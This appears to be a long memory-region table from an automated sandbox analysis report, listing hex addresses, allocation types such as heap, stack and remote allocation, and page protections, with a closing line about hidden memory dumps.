page read and write
63C000
heap
page read and write
2E0000
heap
page read and write
5130000
trusted library allocation
page read and write
50AD000
stack
page read and write
2CD000
stack
page read and write
48B3000
heap
page read and write
29DF000
trusted library allocation
page read and write
1F70000
heap
page read and write
5D8000
heap
page read and write
1F30000
heap
page read and write
B80000
heap
page read and write
4948000
heap
page read and write
9B0000
trusted library allocation
page read and write
527000
heap
page read and write
2ACA000
trusted library allocation
page read and write
24C000
stack
page read and write
316000
stack
page read and write
2B13000
trusted library allocation
page read and write
1C20000
heap
page read and write
E5E000
stack
page read and write
A70000
trusted library allocation
page execute and read and write
215F000
stack
page read and write
E20000
trusted library allocation
page read and write
53AE000
stack
page read and write
46EF000
stack
page read and write
39C0000
trusted library allocation
page read and write
4E4E000
stack
page read and write
4850000
heap
page read and write
20CE000
stack
page read and write
4DBE000
stack
page read and write
2EFC000
stack
page read and write
1F70000
heap
page read and write
330000
heap
page read and write
39C0000
trusted library allocation
page read and write
2AC2000
heap
page read and write
3E30000
heap
page read and write
63E000
heap
page read and write
49B5000
heap
page read and write
1F6E000
heap
page read and write
39C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
20000
heap
page read and write
61E000
heap
page read and write
4851000
heap
page read and write
3A3B000
heap
page read and write
469F000
stack
page read and write
B5D000
heap
page read and write
2AC2000
heap
page read and write
4ED9000
heap
page read and write
4F16000
heap
page read and write
48B3000
heap
page read and write
1FCE000
stack
page read and write
5D7000
heap
page read and write
5A8000
heap
page read and write
48B4000
heap
page read and write
1E0000
trusted library allocation
page read and write
2ADA000
heap
page read and write
790000
heap
page read and write
2ADF000
heap
page read and write
550000
heap
page read and write
9DE000
stack
page read and write
232F000
stack
page read and write
49D1000
heap
page read and write
4D1E000
stack
page read and write
9C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
2B19000
trusted library allocation
page read and write
1D3000
trusted library allocation
page execute and read and write
3669000
trusted library allocation
page read and write
2941000
trusted library allocation
page read and write
400000
heap
page read and write
3DF7000
heap
page read and write
283A000
trusted library allocation
page read and write
4F43000
heap
page read and write
56C000
heap
page read and write
2B98000
heap
page read and write
3D7000
heap
page read and write
2BCE000
stack
page read and write
49C1000
heap
page read and write
23D0000
heap
page read and write
3A84000
heap
page read and write
DE0000
heap
page execute and read and write
49CA000
heap
page read and write
8B0000
heap
page read and write
28E1000
trusted library allocation
page read and write
3E7000
heap
page read and write
39C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
104E000
stack
page read and write
39C0000
trusted library allocation
page read and write
5144000
heap
page read and write
6BB000
heap
page read and write
537000
heap
page read and write
39D1000
heap
page read and write
E70000
trusted library allocation
page read and write
5CE000
stack
page read and write
3AE000
heap
page read and write
2641000
trusted library allocation
page read and write
2C0000
heap
page read and write
1E80000
heap
page read and write
520000
heap
page read and write
2910000
heap
page read and write
597000
heap
page read and write
504000
heap
page read and write
5130000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
257F000
stack
page read and write
170000
heap
page read and write
26D000
stack
page read and write
49D1000
heap
page read and write
5F6000
heap
page read and write
4FBD000
heap
page read and write
4CC0000
heap
page read and write
F66000
heap
page execute and read and write
2BAE000
stack
page read and write
20FF000
stack
page read and write
2ABB000
heap
page read and write
293E000
stack
page read and write
299E000
stack
page read and write
48AF000
stack
page read and write
3641000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
516E000
stack
page read and write | page guard
23CF000
heap
page read and write
294F000
stack
page read and write
5130000
trusted library allocation
page read and write
319000
trusted library allocation
page read and write
2AC2000
heap
page read and write
49E000
heap
page read and write
18C000
stack
page read and write
39C0000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
861000
heap
page read and write
39C0000
trusted library allocation
page read and write
1FC0000
heap
page read and write
480000
trusted library allocation
page read and write
2A0000
heap
page read and write
4114000
trusted library allocation
page read and write
31D000
stack
page read and write
550000
heap
page read and write
BA5000
heap
page read and write
545E000
stack
page read and write
39C0000
trusted library allocation
page read and write
A7000
heap
page read and write
2921000
trusted library allocation
page read and write
550000
heap
page read and write
4EFF000
stack
page read and write
661000
heap
page read and write
207000
trusted library allocation
page execute and read and write
32AB000
trusted library allocation
page read and write
45D000
system
page execute and read and write
3250000
heap
page read and write
10000
heap
page read and write
B3F000
heap
page read and write
10000
heap
page read and write
4D7E000
stack
page read and write
39C0000
trusted library allocation
page read and write
272E000
stack
page read and write
4CBD000
stack
page read and write
3ABD000
heap
page read and write
4DFF000
stack
page read and write
2600000
trusted library allocation
page read and write
658000
heap
page read and write
3C3000
heap
page read and write
3CB000
heap
page read and write
39D8000
heap
page read and write
5130000
trusted library allocation
page read and write
4FA8000
heap
page read and write
4A7F000
stack
page read and write
650000
heap
page read and write
10AA000
stack
page read and write
2C3C000
stack
page read and write
667000
heap
page read and write
39C0000
trusted library allocation
page read and write
5130000
trusted library allocation
page read and write
3DF7000
heap
page read and write
3790000
trusted library allocation
page read and write
558000
heap
page read and write
2D7000
heap
page read and write
71F000
heap
page read and write
401000
heap
page read and write
20000
heap
page read and write
290000
trusted library allocation
page execute and read and write
686000
heap
page read and write
5F0000
heap
page read and write
4CE000
stack
page read and write
1D4000
trusted library allocation
page read and write
4FFF000
stack
page read and write
F2C000
stack
page read and write
23D3000
heap
page read and write
1050000
trusted library allocation
page read and write
10000
heap
page read and write
56D000
heap
page read and write
388F000
stack
page read and write
E60000
trusted library allocation
page read and write
DD0000
trusted library allocation
page read and write
750000
heap
page read and write
370000
heap
page read and write
B60000
heap
page read and write
8AB000
heap
page read and write
4950000
heap
page read and write
49C7000
heap
page read and write
1F0000
heap
page read and write
202000
trusted library allocation
page read and write
BC0000
heap
page read and write
78A000
heap
page read and write
44A000
heap
page read and write
410000
trusted library allocation
page read and write
2C10000
heap
page read and write
80000
heap
page read and write
10000
heap
page read and write
2E0000
heap
page read and write
4BB0000
heap
page read and write
38B9000
heap
page read and write
39C0000
trusted library allocation
page read and write
600000
trusted library allocation
page read and write
5FC0000
heap
page read and write
2AC2000
heap
page read and write
332000
stack
page read and write
667000
heap
page read and write
39C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
478000
remote allocation
page execute and read and write
2100000
heap
page read and write
3AC000
stack
page read and write
EDD000
stack
page read and write
CE0000
heap
page read and write
39C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
4858000
heap
page read and write
4ADE000
stack
page read and write
2CBD000
stack
page read and write
5BCE000
stack
page read and write
2685000
trusted library allocation
page read and write
205000
trusted library allocation
page execute and read and write
AC000
stack
page read and write
4112000
trusted library allocation
page read and write
1D0000
heap
page read and write
3E4000
heap
page read and write
3A3E000
heap
page read and write
1C0000
trusted library allocation
page read and write
330000
trusted library allocation
page read and write
6221000
heap
page read and write
1EA000
trusted library allocation
page read and write
2C2000
heap
page read and write
3A1C000
heap
page read and write
532E000
stack
page read and write
1BC000
stack
page read and write
4C90000
heap
page read and write
39C0000
trusted library allocation
page read and write
299F000
trusted library allocation
page read and write
4B9E000
stack
page read and write
2E72000
heap
page read and write
2F5000
trusted library allocation
page read and write
3A0000
heap
page read and write
622000
heap
page read and write
4F72000
heap
page read and write
667000
heap
page read and write
492F000
stack
page read and write
39C0000
trusted library allocation
page read and write
656000
heap
page read and write
39C0000
trusted library allocation
page read and write
3A89000
heap
page read and write
522000
heap
page read and write
10001000
direct allocation
page execute and read and write
97000
stack
page read and write
2719000
trusted library allocation
page read and write
10000
heap
page read and write
2670000
trusted library allocation
page read and write
712000
heap
page read and write
43E000
heap
page read and write
3A1C000
heap
page read and write
4CDE000
stack
page read and write
38E000
stack
page read and write
3B40000
heap
page read and write
2E3E000
stack
page read and write
200000
trusted library allocation
page read and write
347E000
stack
page read and write
474000
remote allocation
page execute and read and write
2C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
7E0000
trusted library allocation
page read and write
2FA000
trusted library allocation
page read and write
3ABC000
heap
page read and write
2AE1000
heap
page read and write
405000
heap
page read and write
3649000
trusted library allocation
page read and write
3A1E000
stack
page read and write
2010000
remote allocation
page read and write
3EF000
heap
page read and write
277A000
trusted library allocation
page read and write
45DF000
heap
page read and write
4A8E000
stack
page read and write
72F000
stack
page read and write
5130000
trusted library allocation
page read and write
2E6000
heap
page read and write
1F73000
heap
page read and write
4B6E000
stack
page read and write
50C0000
trusted library allocation
page read and write
FA0000
trusted library allocation
page read and write
ACC000
stack
page read and write
2641000
trusted library allocation
page read and write
4BA000
heap
page read and write
38B5000
heap
page read and write
310D000
stack
page read and write
39C0000
trusted library allocation
page read and write
66F000
heap
page read and write
27E000
stack
page read and write
2A0000
heap
page read and write
39C0000
trusted library allocation
page read and write
1D4000
trusted library allocation
page read and write
28F3000
trusted library allocation
page read and write
5D0E000
stack
page read and write
4113000
trusted library allocation
page read and write
536E000
stack
page read and write
39C0000
trusted library allocation
page read and write
530000
heap
page read and write
661000
heap
page read and write
85B000
heap
page read and write
48B3000
heap
page read and write
39E000
stack
page read and write
363D000
stack
page read and write
FB0000
trusted library allocation
page execute and read and write
1AB000
stack
page read and write
DE000
heap
page read and write
61F000
heap
page read and write
5BF000
heap
page read and write
3CE6000
heap
page read and write
39C0000
trusted library allocation
page read and write
2F00000
heap
page read and write
3A71000
heap
page read and write
298D000
trusted library allocation
page read and write
2700000
trusted library allocation
page read and write
28BE000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
2A6000
stack
page read and write
C20000
trusted library allocation
page read and write
661000
heap
page read and write
4BBE000
stack
page read and write
69E000
stack
page read and write
289F000
trusted library allocation
page read and write
35FF000
stack
page read and write
1AC000
stack
page read and write
39C0000
trusted library allocation
page read and write
456000
system
page execute and read and write
26D0000
trusted library allocation
page read and write
32F000
stack
page read and write
202000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
280000
trusted library allocation
page read and write
731000
heap
page read and write
2AA1000
heap
page read and write
6E1000
heap
page read and write
6BB000
heap
page read and write
8A9000
heap
page read and write
4945000
heap
page read and write
A5F000
stack
page read and write
3C70000
heap
page read and write
2B9B000
heap
page read and write
845000
heap
page read and write
2AAC000
heap
page read and write
590000
trusted library allocation
page execute and read and write
680000
heap
page read and write
3DF000
heap
page read and write
5130000
trusted library allocation
page read and write
618E000
stack
page read and write
320000
heap
page read and write
CDD000
stack
page read and write
400000
system
page execute and read and write
4855000
heap
page read and write
504E000
stack
page read and write
6A0000
heap
page read and write
5F4000
heap
page read and write
2A0000
trusted library allocation
page read and write
4D4E000
stack
page read and write
D13000
heap
page read and write
400000
system
page execute and read and write
1CCB000
heap
page read and write
2B3C000
trusted library allocation
page read and write
1F4D000
heap
page read and write
5130000
trusted library allocation
page read and write
1DD000
trusted library allocation
page execute and read and write
3A1C000
heap
page read and write
3A1C000
heap
page read and write
39C0000
trusted library allocation
page read and write
39CF000
heap
page read and write
400000
system
page execute and read and write
4B5E000
stack
page read and write
2BBE000
stack
page read and write
45A000
system
page execute and read and write
84000
heap
page read and write
2926000
trusted library allocation
page read and write
540000
trusted library allocation
page read and write
1D3000
trusted library allocation
page execute and read and write
484F000
stack
page read and write
39C0000
trusted library allocation
page read and write
3A35000
heap
page read and write
2A4000
heap
page read and write
280000
trusted library allocation
page execute and read and write
1E9E000
heap
page read and write
490A000
heap
page read and write
39C0000
trusted library allocation
page read and write
727000
heap
page read and write
39C0000
trusted library allocation
page read and write
650000
heap
page read and write
39C0000
trusted library allocation
page read and write
503C000
stack
page read and write
29D000
stack
page read and write
493F000
heap
page read and write
50C0000
trusted library allocation
page read and write
8882000
trusted library allocation
page read and write
33FF000
stack
page read and write
5162000
heap
page read and write
40D0000
heap
page read and write
E70000
trusted library allocation
page read and write
2A9E000
heap
page read and write
B80000
heap
page read and write
390000
heap
page read and write
2B00000
trusted library allocation
page read and write
5130000
trusted library allocation
page read and write
B40000
heap
page read and write
94E000
stack
page read and write
39C0000
trusted library allocation
page read and write
6210000
heap
page read and write
4F61000
heap
page read and write
560000
heap
page read and write
39D8000
heap
page read and write
62D000
heap
page read and write
1D0000
trusted library allocation
page read and write
280000
heap
page read and write
1E70000
heap
page read and write
205000
trusted library allocation
page execute and read and write
2FAE000
stack
page read and write
5520000
heap
page read and write
2A09000
trusted library allocation
page read and write
4110000
trusted library allocation
page read and write
5130000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
510F000
stack
page read and write
6BB000
heap
page read and write
2EE000
trusted library allocation
page read and write
637000
heap
page read and write
9E31000
trusted library allocation
page read and write
610000
trusted library allocation
page read and write
1F5D000
heap
page read and write
4B8F000
stack
page read and write
580000
trusted library allocation
page read and write
2D0000
heap
page read and write
39C0000
trusted library allocation
page read and write
28A3000
trusted library allocation
page read and write
3C71000
heap
page read and write
1F30000
heap
page read and write
10000
heap
page read and write
4710000
heap
page read and write
3ABE000
heap
page read and write
FB0000
heap
page execute and read and write
230E000
stack
page read and write
4862000
heap
page read and write
20000
heap
page read and write
39CF000
heap
page read and write
2713000
trusted library allocation
page read and write
3A6000
heap
page read and write
C40000
trusted library allocation
page read and write
300000
heap
page read and write
313000
trusted library allocation
page read and write
5A0000
heap
page read and write
2A9000
stack
page read and write
A60000
trusted library allocation
page read and write
24D0000
heap
page read and write
37A9000
trusted library allocation
page read and write
1E5E000
stack
page read and write
8A6000
heap
page read and write
5130000
trusted library allocation
page read and write
4F3D000
stack
page read and write
41FE000
stack
page read and write
62B000
heap
page read and write
1D6000
heap
page read and write
719000
heap
page read and write
661000
heap
page read and write
340000
heap
page read and write
2B0E000
unkown
page read and write
9431000
trusted library allocation
page read and write
610E000
stack
page read and write
39C0000
trusted library allocation
page read and write
4B1F000
stack
page read and write
A0000
heap
page read and write
62F000
heap
page read and write
27BF000
stack
page read and write
39C0000
trusted library allocation
page read and write
B30000
heap
page read and write
41F000
system
page execute and read and write
1F8000
stack
page read and write
370000
trusted library allocation
page read and write
11C000
stack
page read and write
28AB000
trusted library allocation
page read and write
2FD0000
heap
page read and write
2A02000
heap
page read and write
1ED000
stack
page read and write
3CFC000
stack
page read and write
45B0000
heap
page read and write
5A0000
trusted library allocation
page read and write
495F000
stack
page read and write
65B000
heap
page read and write
AF0000
heap
page execute and read and write
39C0000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
306000
heap
page read and write
A1E000
stack
page read and write
672000
heap
page read and write
20E0000
heap
page read and write
FAF000
stack
page read and write
4DBE000
stack
page read and write
39C0000
trusted library allocation
page read and write
220000
heap
page read and write
485D000
heap
page read and write
710000
heap
page read and write
49CF000
heap
page read and write
2AF6000
heap
page read and write
39D7000
heap
page read and write
22AF000
stack
page read and write
1EA000
trusted library allocation
page read and write
1C95000
heap
page read and write
5C4E000
stack
page read and write
39C0000
trusted library allocation
page read and write
541E000
stack
page read and write
89000
stack
page read and write
32CD000
stack
page read and write
667000
heap
page read and write
5174000
heap
page read and write
625000
heap
page read and write
B30000
trusted library allocation
page execute and read and write
3EF000
heap
page read and write
282000
trusted library allocation
page read and write
3A1C000
heap
page read and write
2AC2000
heap
page read and write
46E000
stack
page read and write
470000
heap
page read and write
5E40000
heap
page read and write
2B20000
trusted library allocation
page read and write
746000
heap
page read and write
5130000
trusted library allocation
page read and write
50C0000
trusted library allocation
page read and write
28AE000
stack
page read and write
2A00000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
100F000
stack
page read and write
90E000
stack
page read and write
BBA000
heap
page read and write
CC0000
heap
page read and write
297E000
stack
page read and write
3AB9000
heap
page read and write
5130000
trusted library allocation
page read and write
3FC0000
heap
page read and write
39C0000
heap
page read and write
539000
trusted library allocation
page read and write
6C0000
heap
page read and write
4C0000
heap
page read and write
4E0000
heap
page read and write
390000
heap
page read and write
4AAE000
stack
page read and write
6FA000
heap
page read and write
39C0000
trusted library allocation
page read and write
49BB000
stack
page read and write
45AD000
stack
page read and write
50E000
stack
page read and write
810000
heap
page read and write
39D5000
heap
page read and write
2260000
heap
page read and write
49D1000
heap
page read and write
2ADC000
heap
page read and write
39C0000
trusted library allocation
page read and write
50E000
stack
page read and write
AEF000
stack
page read and write
4858000
heap
page read and write
14C000
stack
page read and write
2B90000
heap
page read and write
48EC000
stack
page read and write
4F8A000
heap
page read and write
3ABC000
heap
page read and write
3A81000
heap
page read and write
49E000
stack
page read and write
14E000
stack
page read and write
4939000
heap
page read and write
41B000
heap
page read and write
1C0000
trusted library allocation
page read and write
4CE000
heap
page read and write
5130000
trusted library allocation
page read and write
2506000
heap
page read and write
6C2000
heap
page read and write
74F000
heap
page read and write
15C000
stack
page read and write
69E000
stack
page read and write
45EF000
heap
page read and write
775000
heap
page read and write
41A9000
trusted library allocation
page read and write
2AB1000
heap
page read and write
C30000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
530000
trusted library allocation
page read and write
3DF000
heap
page read and write
3A6000
heap
page read and write
495E000
stack
page read and write
E6B000
stack
page read and write
4770000
heap
page read and write
168000
stack
page read and write
658000
heap
page read and write
160000
direct allocation
page read and write
3E0000
heap
page read and write
282E000
stack
page read and write
39C0000
trusted library allocation
page read and write
459000
system
page execute and read and write
6CD000
heap
page read and write
6A7000
heap
page read and write
487000
heap
page read and write
4943000
heap
page read and write
362000
heap
page read and write
820000
heap
page read and write
529E000
stack
page read and write
28DF000
stack
page read and write
1052000
trusted library allocation
page read and write
656000
heap
page read and write
62E000
heap
page read and write
B87000
heap
page read and write
3BA0000
heap
page read and write
A0E000
stack
page read and write
473000
system
page execute and read and write
724000
heap
page read and write
4B2E000
stack
page read and write
39C0000
trusted library allocation
page read and write
55A000
heap
page read and write
4D7000
heap
page read and write
4111000
trusted library allocation
page read and write
516F000
stack
page read and write
39CF000
heap
page read and write
4BDD000
stack
page read and write
4EDE000
heap
page read and write
3EC0000
heap
page read and write
39C0000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
1DD000
trusted library allocation
page execute and read and write
1D0000
trusted library allocation
page read and write
2684000
trusted library allocation
page read and write
2D4F000
stack
page read and write
4115000
trusted library allocation
page read and write
3600000
heap
page read and write
72C000
heap
page read and write
6BC000
heap
page read and write
610000
heap
page read and write
39C0000
trusted library allocation
page read and write
45C000
system
page execute and read and write
4DBF000
stack
page read and write
49B5000
heap
page read and write
59E000
heap
page read and write
2FB000
stack
page read and write
4E0000
trusted library allocation
page read and write
265F000
trusted library allocation
page read and write
2AAC000
heap
page read and write
F60000
heap
page execute and read and write
A10000
trusted library allocation
page read and write
39BF000
stack
page read and write
29DD000
trusted library allocation
page read and write
3EC000
heap
page read and write
39C0000
trusted library allocation
page read and write
2010000
remote allocation
page read and write
3C6000
heap
page read and write
8B0000
heap
page read and write
600000
heap
page read and write
10000
heap
page read and write
49D1000
heap
page read and write
2E1000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
F50000
heap
page read and write
63E000
stack
page read and write
490000
trusted library allocation
page read and write
620000
heap
page read and write
39C0000
trusted library allocation
page read and write
2AAC000
heap
page read and write
2FB000
stack
page read and write
3880000
heap
page read and write
39C0000
trusted library allocation
page read and write
275F000
stack
page read and write
6431000
trusted library allocation
page read and write
267F000
stack
page read and write
4A3E000
stack
page read and write
27F000
stack
page read and write
827000
heap
page read and write
667000
heap
page read and write
1EA9000
heap
page read and write
2AF1000
heap
page read and write
2AA8000
heap
page read and write
49FE000
stack
page read and write
5D4000
heap
page read and write
6C0000
heap
page read and write
39C0000
trusted library allocation
page read and write
5080000
heap
page read and write
7F0000
trusted library allocation
page read and write
15B000
stack
page read and write
5140000
heap
page read and write
81A000
heap
page read and write
2901000
trusted library allocation
page read and write
404000
heap
page read and write
385E000
stack
page read and write
81E000
stack
page read and write
1FA000
trusted library allocation
page execute and read and write
AF6000
heap
page execute and read and write
C231000
trusted library allocation
page read and write
23D7000
heap
page read and write
62E000
heap
page read and write
34EE000
stack
page read and write
2A9E000
stack
page read and write
33A0000
heap
page read and write
A80000
heap
page read and write
57F000
stack
page read and write
1F7000
trusted library allocation
page execute and read and write
C50000
trusted library allocation
page read and write
2AA0000
heap
page read and write
3669000
trusted library allocation
page read and write
F8000
heap
page read and write
6DB000
heap
page read and write
2D70000
heap
page read and write
2AA4000
heap
page read and write
2652000
trusted library allocation
page read and write
D17000
heap
page read and write
4891000
heap
page read and write
39C0000
trusted library allocation
page read and write
There are 926 hidden memdumps, click here to show them.